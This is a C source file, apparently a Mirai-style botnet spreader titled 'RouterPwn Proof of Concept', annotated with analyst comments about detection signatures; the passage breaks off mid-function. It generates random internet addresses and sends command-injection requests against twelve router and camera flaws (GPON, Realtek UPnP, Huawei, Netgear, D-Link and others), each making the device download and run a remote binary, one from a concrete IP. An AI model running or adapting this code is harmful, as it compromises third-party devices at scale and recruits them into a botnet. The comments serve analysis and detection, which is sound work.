1 | //RouterPwn Proof of Concept | |
2 | //Target 12 different router exploits | |
3 | //Don't forget to edit your payloads | |
4 | ||
5 | #include <stdlib.h> | |
6 | #include <stdarg.h> | |
7 | #include <stdio.h> | |
8 | #include <sys/socket.h> | |
9 | #include <sys/types.h> | |
10 | #include <netinet/in.h> | |
11 | #include <arpa/inet.h> | |
12 | #include <netdb.h> | |
13 | #include <signal.h> | |
14 | #include <strings.h> | |
15 | #include <string.h> | |
16 | #include <sys/utsname.h> | |
17 | #include <unistd.h> | |
18 | #include <fcntl.h> | |
19 | #include <errno.h> | |
20 | #include <netinet/udp.h> | |
21 | #include <netinet/tcp.h> | |
22 | #include <sys/wait.h> | |
23 | #include <sys/ioctl.h> | |
24 | #include <net/if.h> | |
25 | ||
// First-octet candidate tables for the two GPON generators: GPON8080_IPGen()
// indexes GPON1_Range and GPON80_IPGen() indexes GPON2_Range; the remaining
// three octets of each generated address come from rand(). For defenders,
// these leading octets are where this sample's GPON probes are concentrated.
int GPON1_Range [] = {187,189,200,201,207};
int GPON2_Range [] = {1,2,5,31,37,41,42,58,62,78,82,84,88,89,91,92,95,103,113,118,145,147,178,183,185,195,210,212};
28 | ||
// PIDs returned by fork() in exploit_worker() and the exploit_socket_*
// functions. Nothing on this page waits on any of them; only exploit_pid is
// ever read (by exploit_kill()), and scanner2_pid is never assigned.
// 'timeout' is not read by any function here: socket_connect_tcp() declares a
// local struct timeval of the same name that shadows it.
int exploit_pid, scanner2_pid, scanner3_pid, scanner4_pid, scanner5_pid, scanner6_pid, scanner7_pid, scanner8_pid, scanner9_pid, scanner10_pid, scanner11_pid, scanner12_pid, scanner13_pid, timeout = 100000;
// Scratch octets for generated target addresses; every *_IPGen() overwrites
// the leading entries before formatting them with "%d.%d.%d.%d".
// uint8_t comes from <stdint.h>, which is not in the include list above (it
// may arrive transitively on some platforms).
static uint8_t ipState[40] = {0};
// Unused at file scope; exploit_worker() shadows 'i' with its own local.
int max = 0, i = 0;
32 | ||
// Open a TCP connection to host:port and return the connected descriptor, or
// 0 on failure (name lookup, socket() or connect() error). Every caller on
// this page passes a dotted-quad string built by a *_IPGen() function, so
// gethostbyname() acts as an address parser here rather than a DNS client.
// Notes for anyone analysing this sample:
//  - only SO_SNDTIMEO (3 s) is set; no receive timeout, and no caller ever
//    reads from the socket. Whether the send timeout bounds connect() is
//    platform-dependent.
//  - setsockopt() runs before the socket() result is checked, and addr is not
//    zeroed before its fields are filled in.
//  - a failed connect() returns 0 without closing the descriptor.
int socket_connect_tcp(char *host, in_port_t port) // tcp socket for sending POST/GET requests
{
    struct hostent *hp;
    struct sockaddr_in addr;
    int on = 1, sock;  // 'on' is assigned but never used
    struct timeval timeout;
    timeout.tv_sec = 3; // 3 sec timeout on socket
    timeout.tv_usec = 0;
    if ((hp = gethostbyname(host)) == NULL) return 0;
    bcopy(hp->h_addr, &addr.sin_addr, hp->h_length); // copies h_length bytes into sin_addr
    addr.sin_port = htons(port);
    addr.sin_family = AF_INET;
    sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    setsockopt(sock, SOL_SOCKET, SO_SNDTIMEO, (char *)&timeout, sizeof(timeout)); // applied even if sock == -1
    if (sock == -1) return 0;
    if (connect(sock, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) == -1) return 0;
    return sock;
}
51 | ||
52 | ||
// Fork a child that sends one crafted HTTP request to host:8080 and then
// exits; the parent (and the fork()-failed case) returns immediately and
// never reaps the child.
// Wire characteristics (useful as detection signatures; the literal below is
// kept verbatim): POST /GponForm/diag_Form?images/ with a fixed
// "Host: 127.0.0.1:8080" (not the target), User-Agent "Hello, World", a
// constant Content-Length header that is not derived from the body, and a
// dest_host form field that embeds shell metacharacters and a wget/sh
// sequence. The download host in this paste is the 0.0.0.0 placeholder.
// The "[Pwn] Found Exploitable Device" line is printed whenever the TCP
// connect succeeded; no response is read, so it is not evidence that the
// request had any effect. The write() result is ignored.
void exploit_socket_gpon8080(unsigned char *host)
{
    scanner3_pid = fork();

    if (scanner3_pid > 0 || scanner3_pid == -1)
        return;  // parent, or fork() failed: nothing more to do here

    int gpon_socket1;
    char gpon_request1[1024];

    gpon_socket1 = socket_connect_tcp((char *)host, 8080);

    sprintf(gpon_request1, "POST /GponForm/diag_Form?images/ HTTP/1.1\r\nHost: 127.0.0.1:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: Hello, World\r\nContent-Length: 118\r\n\r\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://0.0.0.0/jarrygod.mips+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0");

    if (gpon_socket1 != 0)  // socket_connect_tcp() reports failure as 0
    {
        write(gpon_socket1, gpon_request1, strlen(gpon_request1));
        usleep(200000);  // 200 ms pause before close()
        close(gpon_socket1);
        printf("[Pwn] Found Exploitable Device %s [GPON] [8080]\n", host);
    }
    exit(0);  // the child always terminates here, even when the connect failed
}
76 | ||
// Same pattern as exploit_socket_gpon8080(), aimed at host:80: fork a child
// that sends a single POST /GponForm/diag_Form?images/ request and exits.
// The literal differs from the 8080 variant only in the fixed Host header
// port and the /tmp file name used in the dest_host field; the download host
// is again the 0.0.0.0 placeholder. The success message only means the TCP
// connect succeeded. The parent returns at once and never waits on the child.
void exploit_socket_gpon80(unsigned char *host)
{
    scanner4_pid = fork();

    if (scanner4_pid > 0 || scanner4_pid == -1)
        return;  // parent, or fork() failed

    int gpon_socket2;
    char gpon_request2[1024];

    gpon_socket2 = socket_connect_tcp((char *)host, 80);

    sprintf(gpon_request2, "POST /GponForm/diag_Form?images/ HTTP/1.1\r\nHost: 127.0.0.1:80\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: Hello, World\r\nContent-Length: 118\r\n\r\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://0.0.0.0/jarrygod.mips+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0");

    if (gpon_socket2 != 0)  // 0 means socket_connect_tcp() failed
    {
        write(gpon_socket2, gpon_request2, strlen(gpon_request2));  // result ignored
        usleep(200000);
        close(gpon_socket2);
        printf("[Pwn] Found Exploitable Device %s [GPON] [80]\n", host);
    }
    exit(0);  // child never returns to the caller
}
100 | ||
// Fork a child that sends two UPnP SOAP requests to host:52869, five seconds
// apart, then exits. Both are AddPortMapping actions against /picsdesc.xml
// (SOAPAction urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping)
// whose NewInternalClient element holds a backtick-quoted shell sequence: the
// first fetches a file into /tmp, the second marks it executable and runs it.
// Unlike the other payload literals on this page, this one carries a concrete
// download host (209.141.42.3) instead of the 0.0.0.0 placeholder — treat it
// as an indicator present in this sample. Here the Host header does carry the
// target address, and Content-Length is a fixed 630 not derived from the body.
// The success line is printed on a successful connect only; no reply is read.
void exploit_socket_realtek(unsigned char *host)
{
    scanner5_pid = fork();

    if (scanner5_pid > 0 || scanner5_pid == -1)
        return;  // parent, or fork() failed

    int realtek_socket;
    char realtek_request[1024], realtek_request2[1024];

    realtek_socket = socket_connect_tcp((char *)host, 52869);

    sprintf(realtek_request, "POST /picsdesc.xml HTTP/1.1\r\nHost: %s:52869\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nUser-Agent: Hello, World\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47500</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /tmp/; rm -rf*; wget http://209.141.42.3/jarrygod.mips`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n", host);
    sprintf(realtek_request2, "POST /picsdesc.xml HTTP/1.1\r\nHost: %s:52869\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nUser-Agent: Hello, World\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47500</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /tmp/;chmod +x jarrygod.mips;./jarrygod.mips realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n", host);

    if (realtek_socket != 0)  // 0 means socket_connect_tcp() failed
    {
        write(realtek_socket, realtek_request, strlen(realtek_request));
        sleep(5);  // both requests go over the same keep-alive connection, 5 s apart
        write(realtek_socket, realtek_request2, strlen(realtek_request2));
        usleep(200000);
        close(realtek_socket);
        printf("[Pwn] Found Exploitable Device %s [REALTEK] [52869]\n", host);
    }
    exit(0);  // child never returns to the caller
}
127 | ||
// Fork a child that connects to host:8080 and host:80 (both connects are
// attempted before the request is built), sends the same request on each
// connection that succeeded, and exits.
// Wire characteristics: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=...
// as HTTP/1.0 with no Host header and no other headers; the cmd parameter
// carries a '+'-separated shell sequence with the 0.0.0.0 download placeholder.
// The "¤" inside the literal appears to be a character-encoding artifact of
// the paste; it is kept byte-for-byte here.
// A success line per port is printed on a successful connect only.
void exploit_socket_netgear(unsigned char *host)
{
    scanner6_pid = fork();  // scanner6_pid is also assigned by exploit_socket_huawei()

    if (scanner6_pid > 0 || scanner6_pid == -1)
        return;  // parent, or fork() failed

    int netgear_socket, netgear_socket2;
    char netgear_request[1024];

    netgear_socket = socket_connect_tcp((char *)host, 8080);
    netgear_socket2 = socket_connect_tcp((char *)host, 80);

    sprintf(netgear_request, "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://0.0.0.0/jarrygod.mips+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0\r\n\r\n");

    if (netgear_socket != 0)  // 8080 connected
    {
        write(netgear_socket, netgear_request, strlen(netgear_request));
        usleep(200000);
        close(netgear_socket);
        printf("[Pwn] Found Exploitable Device %s [NETGEAR] [8080]\n", host);
    }
    if (netgear_socket2 != 0)  // 80 connected; same request bytes
    {
        write(netgear_socket2, netgear_request, strlen(netgear_request));
        usleep(200000);
        close(netgear_socket2);
        printf("[Pwn] Found Exploitable Device %s [NETGEAR] [80]\n", host);
    }
    exit(0);  // child never returns to the caller
}
159 | ||
// Fork a child that sends one POST /ctrlt/DeviceUpgrade_1 request to
// host:37215 and exits. The request carries a fully static "Authorization:
// Digest" header (fixed username, realm, nonce, response and cnonce values),
// which makes a strong static signature, and a SOAP Upgrade body
// (urn:schemas-upnp-org:service:WANPPPConnection:1) whose NewStatusURL
// element holds a $(...) command substitution invoking busybox wget against
// the 0.0.0.0 placeholder. The Host header carries the target address.
// This function reuses scanner6_pid, which exploit_socket_netgear() also
// assigns; whichever forks last overwrites the stored PID (it is never used).
// The success line is printed on a successful connect only; no reply is read.
void exploit_socket_huawei(unsigned char *host)
{
    scanner6_pid = fork();

    if (scanner6_pid > 0 || scanner6_pid == -1)
        return;  // parent, or fork() failed

    int huawei_socket;
    char huawei_request[1024];

    huawei_socket = socket_connect_tcp((char *)host, 37215);

    sprintf(huawei_request, "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r\nHost: %s:37215\r\nContent-Length: 601\r\nConnection: keep-alive\r\nAuthorization: Digest username=\"dslf-config\", realm=\"HuaweiHomeGateway\", nonce=\"88645cefb1f9ede0e336e3569d75ee30\", uri=\"/ctrlt/DeviceUpgrade_1\", response=\"3612f843a42db38f48f59d2a3597e19c\", algorithm=\"MD5\", qop=\"auth\", nc=00000001, cnonce=\"248d1a2560100669\"\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\"><NewStatusURL>$(/bin/busybox wget -g 0.0.0.0 -l /tmp/huawei -r /jarrygod.mips;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>", host);

    if (huawei_socket != 0)  // 0 means socket_connect_tcp() failed
    {
        write(huawei_socket, huawei_request, strlen(huawei_request));
        usleep(200000);
        close(huawei_socket);
        printf("[Pwn] Found Exploitable Device %s [HUAWEI] [37215]\n", host);
    }
    exit(0);  // child never returns to the caller
}
183 | ||
// Fork a child that connects to host:7574 and host:5555, sends a TR-064 style
// SOAP request on each connection that succeeded, and exits.
// Wire characteristics: POST /UD/act?1 with SOAPAction
// urn:dslforum-org:service:Time:1#SetNTPServers, a fixed "Host: 127.0.0.1:<port>"
// (not the target), User-Agent "Hello, world", and a SetNTPServers body whose
// NewNTPServer1 element holds a backtick-quoted shell sequence (busybox wget
// against the 0.0.0.0 placeholder); NewNTPServer2..5 each hold `echo DEATH`.
// The two literals are identical apart from the port in the Host header and
// are kept verbatim, including the "&qu ot;" sequence as it appears in the paste.
// A success line per port is printed on a successful connect only.
void exploit_socket_tr064(unsigned char *host)
{
    scanner7_pid = fork();

    if (scanner7_pid > 0 || scanner7_pid == -1)
        return;  // parent, or fork() failed

    int tr064_socket, tr064_socket2;
    char tr064_request[1024], tr064_request2[1024];

    tr064_socket = socket_connect_tcp((char *)host, 7574);
    tr064_socket2 = socket_connect_tcp((char *)host, 5555);

    sprintf(tr064_request, "POST /UD/act?1 HTTP/1.1\r\nHost: 127.0.0.1:7574\r\nUser-Agent: Hello, world\r\nSOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers\r\nContent-Type: text/xml\r\nContent-Length: 640\r\n\r\n<?xml version=\"1.0\"?><SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><SOAP-ENV:Body><u:SetNTPServers xmlns:u=\"urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://0.0.0.0/tr064 && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>");
    sprintf(tr064_request2, "POST /UD/act?1 HTTP/1.1\r\nHost: 127.0.0.1:5555\r\nUser-Agent: Hello, world\r\nSOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers\r\nContent-Type: text/xml\r\nContent-Length: 640\r\n\r\n<?xml version=\"1.0\"?><SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><SOAP-ENV:Body><u:SetNTPServers xmlns:u=\"urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://0.0.0.0/tr064 && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>");

    if (tr064_socket != 0)  // 7574 connected
    {
        write(tr064_socket, tr064_request, strlen(tr064_request));
        usleep(200000);
        close(tr064_socket);
        printf("[Pwn] Found Exploitable Device %s [TR-064] [7574]\n", host);
    }
    if (tr064_socket2 != 0)  // 5555 connected
    {
        write(tr064_socket2, tr064_request2, strlen(tr064_request2));
        usleep(200000);
        close(tr064_socket2);
        printf("[Pwn] Found Exploitable Device %s [TR-064] [5555]\n", host);
    }
    exit(0);  // child never returns to the caller
}
216 | ||
// Fork a child that sends one POST /HNAP1/ request to host:80 and exits.
// Wire characteristics: HTTP/1.0 with the target in the Host header; the
// shell sequence lives in the SOAPAction header, appended after the
// http://purenetworks.com/HNAP1/ prefix (backtick-quoted, 0.0.0.0 placeholder
// download host), while the SOAP body is an innocuous-looking AddPortMapping.
// Detection therefore needs to inspect the SOAPAction header, not the body.
// The success line is printed on a successful connect only; no reply is read.
void exploit_socket_hnap(unsigned char *host)
{
    scanner8_pid = fork();

    if (scanner8_pid > 0 || scanner8_pid == -1)
        return;  // parent, or fork() failed

    int hnap_socket;
    char hnap_request[1024];

    hnap_socket = socket_connect_tcp((char *)host, 80);

    sprintf(hnap_request, "POST /HNAP1/ HTTP/1.0\r\nHost: %s:80\r\nContent-Type: text/xml; charset=\"utf-8\"\r\nSOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://0.0.0.0/jarrygod.mips && chmod 777 /tmp/jarrygod.mips/ && /tmp/jarrygod.mips`\r\nContent-Length: 640\r\n\r\n<?xml version=\"1.0\" encoding=\"utf-8\"?><soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"><soap:Body><AddPortMapping xmlns=\"http://purenetworks.com/HNAP1/\"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>\r\n\r\n", host);

    if (hnap_socket != 0)  // 0 means socket_connect_tcp() failed
    {
        write(hnap_socket, hnap_request, strlen(hnap_request));
        usleep(200000);
        close(hnap_socket);
        printf("[Pwn] Found Exploitable Device %s [HNAP] [80]\n", host);
    }
    exit(0);  // child never returns to the caller
}
240 | ||
// Fork a child that sends one GET request to host:81 and exits.
// Wire characteristics: HTTP/1.0, no Host header, request path beginning
// /language/Swedish followed by a shell sequence in which ${IFS} stands in
// for spaces (0.0.0.0 placeholder download host). The ${IFS} pattern in a
// URI is itself a usable signature. Success line on successful connect only.
void exploit_socket_crossweb(unsigned char *host)
{
    scanner9_pid = fork();

    if (scanner9_pid > 0 || scanner9_pid == -1)
        return;  // parent, or fork() failed

    int crossweb_socket;
    char crossweb_request[1024];

    crossweb_socket = socket_connect_tcp((char *)host, 81);

    sprintf(crossweb_request, "GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://0.0.0.0/jarrygod.arm7;sh${IFS}/tmp/jarrygod.arm7&>r&&tar${IFS}/string.js HTTP/1.0\r\n\r\n");

    if (crossweb_socket != 0)  // 0 means socket_connect_tcp() failed
    {
        write(crossweb_socket, crossweb_request, strlen(crossweb_request));
        usleep(200000);
        close(crossweb_socket);
        printf("[Pwn] Found Exploitable Device %s [CROSSWEB] [81]\n", host);
    }
    exit(0);  // child never returns to the caller
}
264 | ||
// Fork a child that sends one GET /shell?... request to host:80 and exits.
// Wire characteristics: HTTP/1.1 with the target in the Host header,
// User-Agent "Hello, world", and the whole shell sequence in the query
// string, '+'-separated (0.0.0.0 placeholder download host).
// The success line is printed on a successful connect only; no reply is read.
void exploit_socket_jaws(unsigned char *host)
{
    scanner10_pid = fork();

    if (scanner10_pid > 0 || scanner10_pid == -1)
        return;  // parent, or fork() failed

    int jaws_socket;
    char jaws_request[1024];

    jaws_socket = socket_connect_tcp((char *)host, 80);

    sprintf(jaws_request, "GET /shell?cd+/tmp;rm+-rf+*;wget+http://0.0.0.0/jarrygod.arm7;chmod+777+jarrygod.arm7;/tmp/jarrygod.arm7+jaws HTTP/1.1\r\nUser-Agent: Hello, world\r\nHost: %s:80\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection: keep-alive\r\n\r\n", host);

    if (jaws_socket != 0)  // 0 means socket_connect_tcp() failed
    {
        write(jaws_socket, jaws_request, strlen(jaws_request));
        usleep(200000);
        close(jaws_socket);
        printf("[Pwn] Found Exploitable Device %s [JAWS] [80]\n", host);
    }
    exit(0);  // child never returns to the caller
}
288 | ||
// Fork a child that sends one UPnP SOAP request to host:49152 and exits.
// Wire characteristics: POST /soap.cgi?service=WANIPConn1 with SOAPAction
// ...WANIPConnection:1#AddPortMapping, the target in the Host header, a fixed
// Content-Length of 630, and a backtick-quoted shell sequence in
// NewInternalClient (0.0.0.0 placeholder download host). The XML body is not
// well-formed (unclosed NewPortMappingDescription, mixed SOAP-ENV/SOAPENV
// closing tags) — kept verbatim, and usable as a signature in itself.
// The log line here lacks the leading '[' used elsewhere; also verbatim.
// The success line is printed on a successful connect only; no reply is read.
void exploit_socket_dlink(unsigned char *host)
{
    scanner11_pid = fork();

    if (scanner11_pid > 0 || scanner11_pid == -1)
        return;  // parent, or fork() failed

    int dlink_socket;
    char dlink_request[1024];

    dlink_socket = socket_connect_tcp((char *)host, 49152);

    sprintf(dlink_request, "POST /soap.cgi?service=WANIPConn1 HTTP/1.1\r\nHost: %s:49152\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nUser-Agent: Hello, World\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><SOAP-ENV:Body><m:AddPortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://0.0.0.0/jarrygod.mips;/tmp/jarrygod.mips dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>\r\n\r\n", host);

    if (dlink_socket != 0)  // 0 means socket_connect_tcp() failed
    {
        write(dlink_socket, dlink_request, strlen(dlink_request));
        usleep(200000);
        close(dlink_socket);
        printf("Pwn] Found Exploitable Device %s [DLINK] [49152]\n", host);
    }
    exit(0);  // child never returns to the caller
}
312 | ||
// Fork a child that sends one GET /cgi-bin/;... request to host:8443 and
// exits. The request literal is a bare request line with ${IFS} standing in
// for spaces; it carries no HTTP version, no headers and no terminating CRLF,
// so exactly those bytes go on the wire (the `write()` sends the buffer as-is).
// Port 8443 is commonly TLS, but this code speaks plaintext on it.
// Reached from R7000_IPGen() despite the differing names. The success line is
// printed on a successful connect only; no reply is read.
void exploit_socket_r7064(unsigned char *host)
{
    scanner12_pid = fork();

    if (scanner12_pid > 0 || scanner12_pid == -1)
        return;  // parent, or fork() failed

    int r7064_socket;
    char r7064_request[1024];

    r7064_socket = socket_connect_tcp((char *)host, 8443);

    sprintf(r7064_request, "GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://0.0.0.0/jarrygod.mips;${IFS}sh${IFS}/var/tmp/jarrygod.mips");

    if (r7064_socket != 0)  // 0 means socket_connect_tcp() failed
    {
        write(r7064_socket, r7064_request, strlen(r7064_request));
        usleep(200000);
        close(r7064_socket);
        printf("[Pwn] Found Exploitable Device %s [R7064] [8443]\n", host);
    }
    exit(0);  // child never returns to the caller
}
336 | ||
// Fork a child that sends one GET /board.cgi?cmd=... request to host:8080
// and exits. As with exploit_socket_r7064(), the literal is a bare request
// line — no HTTP version, no headers, no terminating CRLF — with a
// '+'-separated shell sequence in the cmd parameter (0.0.0.0 placeholder).
// Reached from VARCON_IPGen(); the trailing argument in the payload is
// spelled "varcron" in the source. The log line lacks the leading '['.
// The success line is printed on a successful connect only; no reply is read.
void exploit_socket_vacron(unsigned char *host)
{
    scanner13_pid = fork();

    if (scanner13_pid > 0 || scanner13_pid == -1)
        return;  // parent, or fork() failed

    int vacron_socket;
    char vacron_request[1024];

    vacron_socket = socket_connect_tcp((char *)host, 8080);

    sprintf(vacron_request, "GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://0.0.0.0/jarrygod.arm7;chmod+777+jarrygod.arm7;/tmp/jarrygod.arm7+varcron");

    if (vacron_socket != 0)  // 0 means socket_connect_tcp() failed
    {
        write(vacron_socket, vacron_request, strlen(vacron_request));
        usleep(200000);
        close(vacron_socket);
        printf("Pwn] Found Exploitable Device %s [VACRON] [8080]\n", host);
    }
    exit(0);  // child never returns to the caller
}
// Build six random dotted-quad strings — first octet drawn from GPON1_Range,
// the other three from rand() % 255 (0..254) — and hand each one to
// exploit_socket_gpon8080(), which forks a child per address.
// Notes: srand(time(NULL)) reseeds from the wall clock on every call, so a
// batch is a function of the current second; time() needs <time.h>, which is
// not among the includes above. The table index is reduced modulo
// sizeof(GPON1_Range)/sizeof(char *), i.e. by pointer size rather than element
// size. No private or reserved ranges are excluded. The char arrays are
// passed to an unsigned char * parameter (implicit pointer conversion).
void GPON8080_IPGen()
{
    char gpon_ip1[16] = {0};char gpon_ip2[16] = {0};char gpon_ip3[16] = {0};
    char gpon_ip4[16] = {0};char gpon_ip5[16] = {0};char gpon_ip6[16] = {0};

    srand(time(NULL));
    int gpon_range1 = rand() % (sizeof(GPON1_Range)/sizeof(char *));int gpon_range2 = rand() % (sizeof(GPON1_Range)/sizeof(char *));int gpon_range3 = rand() % (sizeof(GPON1_Range)/sizeof(char *));
    int gpon_range4 = rand() % (sizeof(GPON1_Range)/sizeof(char *));int gpon_range5 = rand() % (sizeof(GPON1_Range)/sizeof(char *));int gpon_range6 = rand() % (sizeof(GPON1_Range)/sizeof(char *));

    // first octet of each address comes from the table, the rest are random
    ipState[0] = GPON1_Range[gpon_range1];ipState[4] = GPON1_Range[gpon_range2];ipState[8] = GPON1_Range[gpon_range3];
    ipState[12] = GPON1_Range[gpon_range4];ipState[16] = GPON1_Range[gpon_range5];ipState[20] = GPON1_Range[gpon_range6];
    ipState[1] = rand() % 255;ipState[2] = rand() % 255;ipState[3] = rand() % 255;ipState[5] = rand() % 255;ipState[6] = rand() % 255;ipState[7] = rand() % 255;
    ipState[9] = rand() % 255;ipState[10] = rand() % 255;ipState[11] = rand() % 255;ipState[13] = rand() % 255;ipState[14] = rand() % 255;ipState[15] = rand() % 255;
    ipState[17] = rand() % 255;ipState[18] = rand() % 255;ipState[19] = rand() % 255;ipState[21] = rand() % 255;ipState[22] = rand() % 255;ipState[23] = rand() % 255;

    sprintf(gpon_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);sprintf(gpon_ip2, "%d.%d.%d.%d", ipState[4], ipState[5], ipState[6], ipState[7]);
    sprintf(gpon_ip3, "%d.%d.%d.%d", ipState[8], ipState[9], ipState[10], ipState[11]);sprintf(gpon_ip4, "%d.%d.%d.%d", ipState[12], ipState[13], ipState[14], ipState[15]);
    sprintf(gpon_ip5, "%d.%d.%d.%d", ipState[16], ipState[17], ipState[18], ipState[19]);sprintf(gpon_ip6, "%d.%d.%d.%d", ipState[20], ipState[21], ipState[22], ipState[23]);

    // each call forks; the parent side returns immediately
    exploit_socket_gpon8080(gpon_ip1);exploit_socket_gpon8080(gpon_ip2);exploit_socket_gpon8080(gpon_ip3);exploit_socket_gpon8080(gpon_ip4);exploit_socket_gpon8080(gpon_ip5);exploit_socket_gpon8080(gpon_ip6);
}
381 | ||
// Same construction as GPON8080_IPGen(), but the first octet is drawn from
// GPON2_Range and each address goes to exploit_socket_gpon80().
// The same caveats apply: reseeded from time(NULL) on every call (<time.h>
// is not included), table index reduced modulo sizeof(GPON2_Range)/sizeof(char *),
// no range exclusions, and char arrays passed to an unsigned char * parameter.
void GPON80_IPGen()
{
    char gpon2_ip1[16] = {0};char gpon2_ip2[16] = {0};char gpon2_ip3[16] = {0};
    char gpon2_ip4[16] = {0};char gpon2_ip5[16] = {0};char gpon2_ip6[16] = {0};

    srand(time(NULL));
    int gpon2_range1 = rand() % (sizeof(GPON2_Range)/sizeof(char *));int gpon2_range2 = rand() % (sizeof(GPON2_Range)/sizeof(char *));int gpon2_range3 = rand() % (sizeof(GPON2_Range)/sizeof(char *));
    int gpon2_range4 = rand() % (sizeof(GPON2_Range)/sizeof(char *));int gpon2_range5 = rand() % (sizeof(GPON2_Range)/sizeof(char *));int gpon2_range6 = rand() % (sizeof(GPON2_Range)/sizeof(char *));

    // first octet from the table, remaining octets rand() % 255
